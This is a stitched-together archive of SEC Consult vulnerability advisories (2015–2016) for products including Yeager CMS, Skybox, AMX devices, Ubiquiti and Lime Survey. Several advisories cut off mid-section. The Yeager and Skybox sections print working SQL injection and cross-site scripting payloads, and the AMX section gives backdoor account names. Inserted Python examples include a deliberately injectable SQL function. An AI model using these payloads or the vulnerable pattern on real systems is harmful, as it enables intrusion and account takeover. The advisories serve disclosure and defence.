-
Since no public fix is available for any of the described vulnerabilities yet,
the proof of concept will not be published.


Vulnerable / tested versions:
-
The following firmware has been tested which was the most recent version
at the time of discovery:
EVW3226_1.0.20


Vendor contact timeline:

2016-01-13: Contacting CERT.at for security contact of
UPC Austria (Liberty Global)
2016-01-17: Contacting vendor Ubee Interactive through
'eusupp...@ubeeinteractive.com' and 'eusa...@ubeeinteractive.com'
requesting security contact.
2016-01-17: Disclosure of identified vulnerabilities to UPC Austria in advance.
2016-01-20: No reply from Ubee Interactive. Requesting direct contact through
UPC Austria.
2016-01-22: Received contact at Ubee Interactive. Establishing contact with
<michael@ubeeinteractive.com> again asking for public key to
sen

SEC Consult SA-20160422-1 :: Multiple vulnerabilities in Digitalstrom Konfigurator

2016-04-22 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < publishing date 20160422-1 >
===
  title: Multiple vulnerabilities in Digitalstrom Konfigurator
product: Digitalstrom Konfigurator
 vulnerable version: 1.10.0
  fixed version: 1.10.4
 CVE number: -
 impact: High
   homepage: http://www.digitalstrom.com/
  found: 2015-10-01
 by: W. Schober (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Digitalstrom is designed to systematically network all the electrical devices
in your home. The control of light ambiances, security technology and
household devices is just the start. You can simply download these new
functions to your Digitalstrom server; they will install themselves
automatically. And tomorrow has already become today."

Source: http://www.digitalstrom.com/en/idea/Good-morning/


Business recommendation:

SEC Consult recommends every user to sign out immediately after configuring
the Digitalstrom installation in the Digitalstrom Konfigurator. This should
prevent cross-site request forgery attacks. Furthermore, every user should be
aware that an attack could occur every time they click on an unknown link.

However, SEC Consult recommends the vendor to conduct a comprehensive security
analysis, based on security source code reviews, in order to identify all
available vulnerabilities in the Digitalstrom Konfigurator and increase the
security of its customers.


Vulnerability overview/description:
---

1) Multiple Persistent Cross-Site Scripting
Digitalstrom Konfigurator suffers from multiple cross-site scripting
vulnerabilities, which allow stealing session tokens and impersonation of
other users in order to gain unauthorized access to the web interface.
Furthermore it is possible to alter the contents of the interface in the
context of the current user.


2) Cross-Site Request Forgery
Digitalstrom Konfigurator doesn't implement any kind of cross-site request
forgery protection. Due to that, attackers are able to execute arbitrary
requests with the privileges of any user. The only requirement is, that a
victim visits a malicious webpage. For example, an administrator can be
forced to execute unwanted actions. Some of these actions are:

  -) Change network configuration
  -) Enable SSH service
  -) Turn various devices on and off


Proof of concept:
-
Has been removed due to the request from the vendor.


Vulnerable / tested versions:
-
Digitalstrom Konfigurator 1.10.0


Vendor contact timeline:

2015-11-09: Transmission of advisory via email
2015-12-02: As requested by Digitalstrom: New PoC for XSS
2016-01-31: Vendor released updated version 1.10.4
2016-04-22: Public advisory release


Solution:
-
Upgrade to version 1.10.4.
The effectiveness of the vendor's update was not verified by the SEC Consult
Vulnerability Lab.


Workaround:
---
no workaround available


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


EOF W. Schober / @2015





SEC Consult SA-20160422-0 :: Insecure credential storage in my devolo Android app

2016-04-22 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20160422-0 >
===
  title: Insecure data storage
product: my devolo - android application - air.de.devolo.my.devolo
 vulnerable version: 1.2.8
  fixed version:
 CVE number:
 impact: High
   homepage: http://www.devolo.com/
  found: 2015-10-30
 by: A. Nochvay (Office Moscow)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
devolo AG has been developing innovative Powerline and data communications
products for private customers and professional users. devolo Home Control
expands on the idea of the easy way to connect and is emerging as a new
product world for the smart home that simply enables greater comfort and
convenience, security and energy savings.

URL: http://www.devolo.com/en/Company/devolo-AG


Business recommendation:

Attackers might be able to recover sensitive information from stolen or lost
devices. With this information attackers can control the user's smart devices,
change the temperature and watch the user's remote camera.

SEC Consult recommends not to store sensitive information on mobile devices.


Vulnerability overview/description:
---
The application "my devolo" uses the SharedPreferences android mechanism for
storing information about the user including login credentials for the site
mydevolo.com. In the event that an adversary physically attains the mobile
device, the adversary might be able to hook up the mobile device to a computer
with freely available software. These tools allow the adversary to see all third
party application directories.


Proof of concept:
-
Has been removed due to the request from the vendor.


Vulnerable / tested versions:
-
The vulnerability has been discovered in "my devolo" version 1.2.8, which
is the latest version in Google Play Store at this time.


Vendor contact timeline:

2015-11-10: Transmission of advisory via a data-exchange platform provided by
the vendor
2016-02-23: Confirmation of the described issue via email by vendor
2016-04-22: Public advisory release


Solution:
-
no solution available


Workaround:
---
no workaround available


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm



EOF Aleksandr Nochvay / @2015





SEC Consult SA-20160210-0 :: Yeager CMS Multiple Vulnerabilities

2016-02-10 Thread SEC Consult Vulnerability Lab

SEC Consult Vulnerability Lab Security Advisory < 20160210-0 >
===
  title: Multiple Vulnerabilities
product: Yeager CMS
 vulnerable version: 1.2.1
  fixed version: 1.3
 CVE number: CVE-2015-7567, CVE-2015-7568, CVE-2015-7569, CVE-2015-7570,
 CVE-2015-7571, CVE-2015-7572
 impact: Critical
   homepage: http://yeager.cm/en/home/
  found: 2015-11-18
 by: P. Morimoto (Office Bangkok)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
Yeager is an open source CMS that aims to become the most cost/time-effective
solution for medium and large web sites and applications.


Business recommendation:
Yeager CMS suffers from multiple vulnerabilities due to improper input
validation and unprotected test scripts. By exploiting these vulnerabilities
an attacker could:
1. Change users' passwords, including the administrator's account.
2. Gain full access to the Yeager CMS database.
3. Determine internal servers that are inaccessible from the Internet.
4. Attack other users of the Yeager CMS with Cross-Site Scripting.

SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.

Vulnerability overview/description:
---
1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)
2. Post-authentication Blind SQL Injection (CVE-2015-7569)
3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)
4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)
5. Non-permanent Cross-site Scripting (CVE-2015-7572)


Proof of concept:
-
1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)
http:///yeager/?action=passwordreset=
http:///yeager/y.php/responder?handler=setNewPassword=sess_2=70
=["noevent",{"yg_property":"setNewPassword","params":{"userToken":""}}]

The vulnerability can also be used for unauthorized reset password of any user.
In order to reset a specific user's password, an attacker will need to provide
a valid email address of the user that he wants to attack.
The email can be retrieved by either social engineering or using the
aforementioned unauthenticated SQL injection vulnerability.

http:///yeager/y.php/responder?handler=recoverLogin=sess_2=70
ata=["noevent",{"yg_property":"recoverLogin","params":{"userEmail":"<victim@ema
il.com>","winID":"1"}}]

The above URL simply creates a password reset token and sends it to the user's
email address. Even without knowing the token, an attacker can then manipulate
the SQL query so that the new password is set immediately.

Note that the new password MUST be at least 8 characters long and must contain
both letters and numbers.

http:///yeager/y.php/responder?handler=setNewPassword=sess_2=70
=["noevent",{"yg_property":"setNewPassword","params":{"userToken":"'+or+ui
d=(select+id+from+yg_user+where+login='<vic...@email.com>')+limit+1--+-","userP
assword":"","winID":"1"}}]
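
The reset flow described above, written out as an added example (not Yeager's code): a token lookup built by string concatenation beside the parameterized, expiring, single-use version, plus the password rule the advisory states. The sqlite schema is constructed; only the table name yg_user is taken from the payload, the rest is hypothetical.

```python
import hashlib
import hmac
import secrets
import sqlite3
import time


def make_db():
    """Constructed in-memory schema for the demonstration (not Yeager's real one)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE yg_user  (id INTEGER PRIMARY KEY, login TEXT UNIQUE, password TEXT);
        CREATE TABLE yg_reset (uid INTEGER, token TEXT, expires INTEGER);
        INSERT INTO yg_user VALUES (1, 'admin@example.com', '');
        INSERT INTO yg_user VALUES (2, 'bob@example.com', '');
    """)
    return db


def hash_password(password):
    """Salted PBKDF2; stored as hex salt and hex derived key."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + dk.hex()


def issue_token(db, login, ttl=900):
    """What recoverLogin should do: a random, time-limited token for one user."""
    row = db.execute("SELECT id FROM yg_user WHERE login = ?", (login,)).fetchone()
    if row is None:
        return None  # same outcome whether or not the address exists
    token = secrets.token_urlsafe(32)
    db.execute("INSERT INTO yg_reset VALUES (?, ?, ?)",
               (row[0], token, int(time.time()) + ttl))
    return token


def user_for_token_unsafe(db, token):
    """The anti-pattern: the token is pasted into the SQL text, so a crafted
    token rewrites the WHERE clause and selects a victim's uid instead."""
    sql = "SELECT uid FROM yg_reset WHERE token = '%s'" % token
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def user_for_token_safe(db, token):
    """Bound parameter, expiry check and constant-time comparison."""
    row = db.execute(
        "SELECT uid, token FROM yg_reset WHERE token = ? AND expires > ?",
        (token, int(time.time())),
    ).fetchone()
    if row is None or not hmac.compare_digest(row[1], token):
        return None
    return row[0]


def password_policy_ok(password):
    """The rule the advisory states: at least 8 characters, letters and digits."""
    return (len(password) >= 8
            and any(c.isalpha() for c in password)
            and any(c.isdigit() for c in password))


def reset_password(db, token, new_password):
    """setNewPassword done safely: the token must resolve and is consumed on use."""
    if not password_policy_ok(new_password):
        return False
    uid = user_for_token_safe(db, token)
    if uid is None:
        return False
    db.execute("UPDATE yg_user SET password = ? WHERE id = ?",
               (hash_password(new_password), uid))
    db.execute("DELETE FROM yg_reset WHERE uid = ?", (uid,))
    db.commit()
    return True
```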

2. Post-authentication Blind SQL Injection (CVE-2015-7569)
http:///yeager/y.php/tab_USERLIST
POST Data:
win_no=4_id=2-user_type=user=wid_4=1==sess_16000&
lh=325_page=2_perpage=1_orderby=_orderdir=4_from=5_limit=6,7=1

3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)
A publicly known Arbitrary File Upload vulnerability of Plupload was found in
Yeager CMS.
Fortunately, successful exploitation requires the PHP directive
"upload_tmp_dir" to be set to an existing directory that contains a writable
subdirectory named "plupload".

By default, the PHP directive "upload_tmp_dir" is empty. As a result, the
script attempts to write the uploaded file to /plupload/, which generally does
not exist on the filesystem.

http:///yeager/ui/js/3rd/plupload/examples/upload.php

4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)
http:///yeager/libs/org/adodb_lite/tests/test_adodb_lite.php
http:///yeager/libs/org/adodb_lite/tests/test_datadictionary.php
http:///yeager/libs/org/adodb_lite/tests/test_adodb_lite_sessions.php

The parameter "dbhost" can be used to perform internal port scan using

SEC Consult SA-20160121-0 :: Deliberately hidden backdoor account in AMX (Harman Professional) devices

2016-01-21 Thread SEC Consult Vulnerability Lab
Disclaimer:
Although the backdoor vulnerability is quite a serious matter, we
have published an accompanying blog post to this technical advisory
which sheds a more funny light on this topic. Visit our blog at
http://blog.sec-consult.com/2016/01/deliberately-hidden-backdoor-account-in.html
for more information.


SEC Consult Vulnerability Lab Security Advisory < 20160121-0 >
===
  title: Deliberately hidden backdoor account
product: Several AMX (HARMAN Professional) devices, see
 section "Vulnerable / tested versions"
 vulnerable version: v1.2.322, v1.3.100 for AMX NX-1200, multiple other products
  fixed version: untested hotfix and firmware updates available
 CVE number: CVE-2015-8362
 impact: critical
   homepage: http://www.amx.com
  found: 2015-03-10
 by: Matthias Klinski, Manuel Hofer (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
"AMX® (www.amx.com) is part of the HARMAN Professional Division, and the
leading brand for the business, education, and government markets for the
company. As such, AMX is dedicated to integrating AV solutions for an IT World.
AMX solves the complexity of managing technology with reliable, consistent and
scalable systems comprising control and automation, system-wide switching and
AV signal distribution, digital signage and technology management. AMX systems
are deployed worldwide in conference rooms, homes, classrooms, network
operation/command centers, hotels, entertainment venues and broadcast
facilities, among others."

Source: http://www.amx.com/automate/aboutamx.aspx


Business recommendation:

Attackers are able to completely compromise the affected devices as they can
gain higher privileges than even administrative access to the system via the
backdoor.

It is highly recommended by SEC Consult not to use these products until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
---
1) Deliberately hidden backdoor account
While analysing the application binary /bin/bw, SEC Consult discovered a
function called "setUpSubtleUserAccount" which adds an administrative
account to the internal user database. This account can be used to log on to
the web interface as well as SSH.
Functions that retrieve the list of all users in the database were found to
deliberately hide this user. Further, using this backdoor account grants
additional features on the remote CLI, such as capturing packets on the
network interface, which not even an administrator account can do.


Proof of concept:
-
The binary /bin/bw which provides core functionality as well as user management
for the AMX NX-1200 implements a function called "setUpSubtleUserAccount",
which is called on system boot. This function adds an administrative account
with hardcoded credentials to the user database:
STMFD   SP!, {R4-R7,LR}
LDR     R4, =aMu1cqhrnyu4 ; "QmxhY2tXaWRvdw"
SUB     SP, SP, #0x44
ADD     R12, R4, #0x38
ADD     LR, SP, #0x58+cSubtleUserPassword
MOV     R5, this
LDMIA   R12!, {this-R3} ; ""
STMIA   LR!, {R0-R3}
ADD     R3, R4, #0x54
LDMIA   R12, {R0,R1}
MOV     R4, #0
ADD     R12, SP, #0x58+cSubtleUserUserName+0x10
STR     R0, [LR],#4
STRB    R4, [R12],#1
STRH    R1, [LR],#2
ADD     R6, SP, #0x58+cSubtleUserUserName

By decoding the strings which are loaded from memory and passed as arguments to
cSubtleUserPassword and cSubtleUserUserName, the following user and password
can be recovered:
user: BlackWidow
password: 
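
The string sweep used to recover the name above, as an added example for auditing a firmware image (not from the advisory or AMX's code): base64-looking runs are pulled out of a binary, padded, decoded, and kept only when they decode to printable text. The sample blob is constructed; the only real value in it is the encoded string quoted in the disassembly.

```python
import base64
import re
import string

# Bytes we accept as "text" after decoding: printable ASCII plus tab/newline.
PRINTABLE = set(string.printable.encode()) - set(b"\x0b\x0c")


def base64_strings(blob, min_len=12):
    """Return (offset, raw, decoded) for every base64-looking run of at least
    min_len characters in blob that decodes to printable text. Unpadded runs
    (as in the binary above) are padded first; runs that decode to non-text,
    such as ordinary identifiers or paths, are dropped as noise."""
    run = re.compile(rb"[A-Za-z0-9+/]{%d,}={0,2}" % min_len)
    hits = []
    for m in run.finditer(blob):
        core = m.group().rstrip(b"=")
        padded = core + b"=" * (-len(core) % 4)
        try:
            decoded = base64.b64decode(padded, validate=True)
        except ValueError:  # bad length or alphabet: not base64 after all
            continue
        if decoded and all(b in PRINTABLE for b in decoded):
            hits.append((m.start(), core.decode(), decoded.decode()))
    return hits


# Constructed stand-in for a data section: a symbol name, the encoded string
# from the listing, a path, and some raw bytes.
SAMPLE_BINARY = (b"\x00\x7fELF\x00\x00"
                 b"setUpSubtleUserAccount\x00"
                 b"QmxhY2tXaWRvdw\x00"
                 b"/usr/sbin/sshd\x00"
                 b"\x01\x02\x03")
```

The symbol name and the path also match the base64 alphabet but decode to non-printable bytes, which is why the printable filter is needed.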

Using these credentials a successful login has been performed to the web based
management interface, as well as the command line interface. Using this
backdoor account grants additional features on the command line interface, such
as capturing packets on the network interface.

Parts of the application which display a list of users are designed to
deliberately hide the backdoor account.

AMX did not remove the backdoor in their first patch; the backdoor username
was merely changed to a DC superhero name.
The new username was: 1MB@tMaN

The hotfix from 2016-01-15 is untested by SEC Consult and it is unknown
whether the backdoor has been removed properly now. Hence the password will
not be published.


Vulnerable / tested versions:
-
The following software versions of the 

SEC Consult whitepaper: Bypassing McAfee Application Whitelisting for Critical Infrastructure Systems

2016-01-12 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab released a new whitepaper titled:

"Bypassing McAfee Application Whitelisting for Critical Infrastructure Systems"
- the dinosaurs want their vuln back

Link to blog overview:
--
Including slides from presentations on this topic (with details & demos on
vulnerabilities & vendor responses):

http://blog.sec-consult.com/2016/01/mcafee-application-control-dinosaurs.html


Direct link to whitepaper:
---
https://www.sec-consult.com/fxdata/seccons/prod/media/Whitepaper_Bypassing_McAfees_Application_Whitelisting_for_critical_infrastructure_systems_v1%200.pdf


Abstract:
-
This paper describes the results of the research conducted by SEC Consult
Vulnerability Lab on the security of McAfee Application Control. This product is
an example of an application whitelisting solution which can be used to further
harden critical systems such as server systems in SCADA environments or client
systems with high security requirements like administrative workstations.
Application whitelisting is a concept that works by whitelisting all installed
software on a system and then preventing the execution of any software that is
not whitelisted. This should prevent the execution of malware and therefore
protect against advanced persistent threat (APT) attacks. McAfee Application
Control is an example of such software. It can be installed on any system, however, the
main field of application is the protection of highly critical infrastructures.
While the core feature of the product is application whitelisting, it also
supports additional security features including write- and read-protection as
well as different memory corruption protections.

The paper will show:

  *  how application whitelisting can be bypassed in multiple ways
  *  how User-Account-Control can be bypassed on such protected systems
  *  how additional protections such as read- or write-protections can be
 bypassed
  *  how additional memory corruption protections can easily be bypassed
  *  that the software can decrease the overall security of your operating
 system


~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult





SEC Consult SA-20151210-0 :: Skybox Platform Multiple Vulnerabilities

2015-12-10 Thread SEC Consult Vulnerability Lab

SEC Consult Vulnerability Lab Security Advisory < 20151210-0 >
===
  title: Multiple Vulnerabilities
product: Skybox Platform
 vulnerable version: <=7.0.611
  fixed version: 7.5.401
 CVE number:
 impact: Critical
   homepage: www.skyboxsecurity.com/products/appliance
  found: 2014-12-04
 by: K. Gudinavicius, M. Heinzl, C. Schwarz (Office Singapore)
     SEC Consult Vulnerability Lab
 An integrated part of SEC Consult
 Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich
 https://www.sec-consult.com
===

Vendor description:
---
"Skybox Security provides cutting-edge risk analytics for enterprise security
management. Our solutions give you complete network visibility, help you
eliminate attack vectors, and optimize your security management processes.
Protect the network and the business."
Source: http://www.skyboxsecurity.com/

Business recommendation:
---
Attackers are able to perform Cross-Site Scripting and SQL Injection attacks
against the Skybox platform. Furthermore, it is possible for
unauthenticated attackers to download arbitrary files and execute arbitrary
code.

SEC Consult recommends that the vendor conduct a comprehensive security
analysis, based on security source code reviews, in order to identify all
vulnerabilities in the Skybox platform and increase the security of its
customers.

Vulnerability overview/description:
---
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
2) Multiple Stored Cross-Site Scripting Vulnerabilities
3) Arbitrary File Download and Directory Traversal Vulnerability
4) Blind SQL Injection Vulnerability
5) Remote Unauthenticated Code Execution

Proof of concept:
---
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
Multiple scripts are prone to reflected Cross-Site Scripting attacks.
The following example demonstrates this issue with the
service VersionRepositoryWebService:

POST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0
Content-type: text/plain
User-Agent: Axis/1.4
Host: localhost:8282
SOAPAction: ""
Content-Length: 863
http://schemas.xmlsoap.org/soap/envelope/;
xmlns:xsd="http://www.w3.org/2001/XMLSchema;
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance;>http://schemas.xmlsoap.org/soap/encoding/;
xmlns:ns1="http://com/skybox/view/webservice/versionrepositoryc4f85
t;a
xmlns:a=http://www.w3.org/1999/xhtmla:body
onload=alert(1)//a9884933253b">http://schemas.xmlsoap.org/soap/encoding/;>Applicationhttp://schemas.xmlsoap.org/soap/encoding/;>windows-64http://schemas.xmlsoap.org/soap/encoding/;>7.0.601

Other scripts and parameters, such as the parameter status of the login script
(located at https://localhost:444/login.html) are affected as well. The
following request demonstrates this issue:
https://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

2) Multiple Stored Cross-Site Scripting Vulnerabilities
Multiple fields of the Skybox Change Manager, which can be accessed at
https://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting
attacks. For example, when creating a new ticket, the title can be misused
to insert JavaScript code. The following request to the server demonstrates
the issue:

Request:
POST /skyboxview/webskybox/tickets HTTP/1.1
Host: localhost:8443
[...]
7|0|18|https://localhost:8443/skyboxview/webskybox/|2725E|com.skybox.view.g
wt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.trans
fer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer
.modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phas
es.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer.
netmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.vi
ew.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel.
TicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItem
Id/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/8
52682809||skyboxview|test">|java.util.ArrayList/41

Other fields, like "Comments" and "Description", are affected as well.

3) Arbitrary File Download and Directory Traversal Vulnerability
Skybox Change Manager allows attachments to be uploaded to and downloaded from
tickets. The download functionality can be exploited to download arbitrary
files. No authentication is required to exploit this vulnerability.

SEC Consult SA-20151105-0 :: Insecure default configuration in Ubiquiti Networks products

2015-11-05 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20151105-0 >
===
  title: Insecure default configuration
product: various Ubiquiti Networks products
 vulnerable version: see Vulnerable / tested versions
  fixed version: none available
 impact: High
   homepage: https://www.ubnt.com/
  found: 2015-08-17
 by: Stefan Viehböck (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets.

Source: http://ir.ubnt.com/

Vulnerability overview/description:
---
1) Hardcoded cryptographic keys
A certificate including its private key is embedded in the firmware of several
Ubiquiti Networks products. The certificate is used for HTTPS (default server
certificate for web based management).

Impersonation, man-in-the-middle or passive decryption attacks are possible.
These attacks allow an attacker to gain access to sensitive information like
admin credentials and use them in further attacks.

Furthermore, searching for the certificate fingerprint in data from
internet-wide scans is a low-cost way of finding the IPs of specific
products/product groups and allows an attacker to exploit vulnerabilities at
scale.

2) Remote management enabled by default
The remote management interface is enabled by default. This allows attackers
to exploit vulnerabilities in the device firmware as well as weak credentials
set by the user.

Further information can also be found in our blog post:
http://blog.sec-consult.com/2015/11/the-omnipresence-of-ubiquiti-networks.html

Proof of concept:
-
1) Hardcoded cryptographic keys
OpenSSL text output for the certificate:
Certificate:
Data:
Version: 1 (0x0)
Serial Number: 13408895465235657399 (0xba15f761dbb7b2b7)
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=US, ST=CA, L=San Jose, O=Ubiquiti Networks Inc.,
OU=Technical Support, CN=UBNT/emailAddress=supp...@ubnt.com
Validity
Not Before: Jun  2 08:35:02 2011 GMT
Not After : Jan  1 08:35:02 2020 GMT
Subject: C=US, ST=CA, L=San Jose, O=Ubiquiti Networks Inc.,
OU=Technical Support, CN=UBNT/emailAddress=supp...@ubnt.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (1024 bit)
Modulus:
Exponent: 65537 (0x10001)
Signature Algorithm: sha1WithRSAEncryption
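
An audit of the text form shown above, as an added example (not from the advisory or the vendor): it parses the fields of `openssl x509 -text` output, flags the properties that make this certificate a poor default (1024-bit key, SHA-1 signature, self-signed, X.509 v1, expiry), and separately reports a serial number seen on more than one host in a fleet scan, which is what a firmware-embedded certificate looks like from the inside. The sample text is a constructed excerpt of the dump with the key and signature bytes omitted.

```python
import re
from datetime import datetime

# Constructed excerpt in the layout of the OpenSSL output above.
SAMPLE_CERT_TEXT = """\
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 13408895465235657399 (0xba15f761dbb7b2b7)
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=US, ST=CA, L=San Jose, O=Ubiquiti Networks Inc., OU=Technical Support, CN=UBNT
        Validity
            Not Before: Jun  2 08:35:02 2011 GMT
            Not After : Jan  1 08:35:02 2020 GMT
        Subject: C=US, ST=CA, L=San Jose, O=Ubiquiti Networks Inc., OU=Technical Support, CN=UBNT
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Exponent: 65537 (0x10001)
"""

FIELDS = {
    "version":   re.compile(r"^\s*Version:\s*(\d+)", re.M),
    "serial":    re.compile(r"^\s*Serial Number:.*\((0x[0-9a-fA-F]+)\)", re.M),
    "sig_alg":   re.compile(r"^\s*Signature Algorithm:\s*(\S+)", re.M),
    "issuer":    re.compile(r"^\s*Issuer:\s*(.+?)\s*$", re.M),
    "subject":   re.compile(r"^\s*Subject:\s*(.+?)\s*$", re.M),
    "not_after": re.compile(r"^\s*Not After\s*:\s*(.+?)\s*$", re.M),
    "key_bits":  re.compile(r"^\s*Public-Key:\s*\((\d+) bit\)", re.M),
}


def parse_cert_text(text):
    """Pick the fields an audit needs out of the text form of a certificate."""
    info = {}
    for name, rx in FIELDS.items():
        m = rx.search(text)
        if m:
            info[name] = m.group(1)
    if "not_after" in info:
        stamp = info["not_after"].replace(" GMT", "")
        info["not_after"] = datetime.strptime(stamp, "%b %d %H:%M:%S %Y")
    return info


def audit_cert(info, today):
    """Return a list of findings; today is an ISO date string such as "2015-11-05"."""
    findings = []
    if int(info.get("key_bits", "0")) < 2048:
        findings.append("weak key: %s-bit RSA" % info.get("key_bits"))
    if info.get("sig_alg", "").lower().startswith(("sha1", "md5")):
        findings.append("weak signature: " + info["sig_alg"])
    if info.get("issuer") == info.get("subject"):
        findings.append("self-signed: issuer equals subject")
    if info.get("version") == "1":
        findings.append("X.509 v1: no extensions, hence no subjectAltName")
    if "not_after" in info and info["not_after"] < datetime.fromisoformat(today):
        findings.append("expired: " + info["not_after"].date().isoformat())
    return findings


def shared_certificates(observations):
    """observations: (host, serial) pairs from a scan of your own estate. The
    same serial on several hosts means one certificate, and therefore one
    private key, is deployed on all of them."""
    hosts = {}
    for host, serial in observations:
        hosts.setdefault(serial, set()).add(host)
    return {serial: sorted(h) for serial, h in hosts.items() if len(h) > 1}
```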


SEC Consult SA-20151022-0 :: Lime Survey Multiple Critical Vulnerabilities

2015-10-23 Thread SEC Consult Vulnerability Lab

SEC Consult Vulnerability Lab Security Advisory < 20151022-0 >
===
  title: Multiple critical vulnerabilities
product: Lime Survey
 vulnerable version: 2.05 up to 2.06+ Build 151014
  fixed version: 2.06+ Build 151016
 CVE number:
 impact: critical
   homepage: https://www.limesurvey.org/
  found: 2015-10-12
 by: P. Morimoto (Office Bangkok)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Singapore
 Vienna (HQ) - Vilnius - Zurich - Bangkok

 https://www.sec-consult.com

===

Vendor description:
---
Lime Survey allows users to quickly create intuitive, powerful,
online question-and-answer surveys that can work for tens to thousands
of participants without much effort.  The survey software itself is
self-guiding for the respondents who are participating.
Lime Survey has surpassed 1,500,000 downloads and is used by a huge number of
private persons, big companies, academic facilities and governmental
institutions around the world.

URL: https://www.limesurvey.org/en/about-limesurvey/references


Business recommendation:
---
By combining the vulnerabilities documented in this advisory,
unauthenticated remote attackers can completely compromise the Lime
Survey application server.

- Arbitrary local files can be downloaded
- Entire Lime Survey database can be accessed
- Arbitrary PHP code can be executed

SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.


Vulnerability overview/description:
---
Due to the lack of function level access control many administrative
functions in Lime Survey can be accessed by remote attackers without
prior authentication.

Moreover, the application does not validate some user input properly.
Unauthenticated attackers can pass specially crafted data to these entry
points, resulting in the following vulnerabilities.

1. Unauthenticated local file disclosure
An attacker can craft a malicious PHP serialized string containing a list of
arbitrary files. This list can be sent to the Lime Survey backup feature
for downloading without prior authentication.

Any files accessible with the privileges of the web server user
can be downloaded.

2. Unauthenticated database dump
An attacker can request the database backup feature without authentication.
The whole Lime Survey database can be downloaded including username and
hashed password of the administrator account.

3. Unauthenticated arbitrary remote code execution
An attacker can inject arbitrary PHP code into the application source code,
allowing a malicious web backdoor to be planted for access to the underlying
web server.

4. Multiple reflected cross-site scripting
The application is prone to multiple reflected cross-site scripting
vulnerabilities.


Proof of concept:
---
The vendor kindly asked SEC Consult to give people enough time to update
their installations.

Because of the high risk vulnerabilities, the proof of concept
section has been removed from this advisory.


Vulnerable / tested versions:
---
The vulnerabilities have been tested on 2.06+ Build 150930
At least the following versions have been identified to be vulnerable:

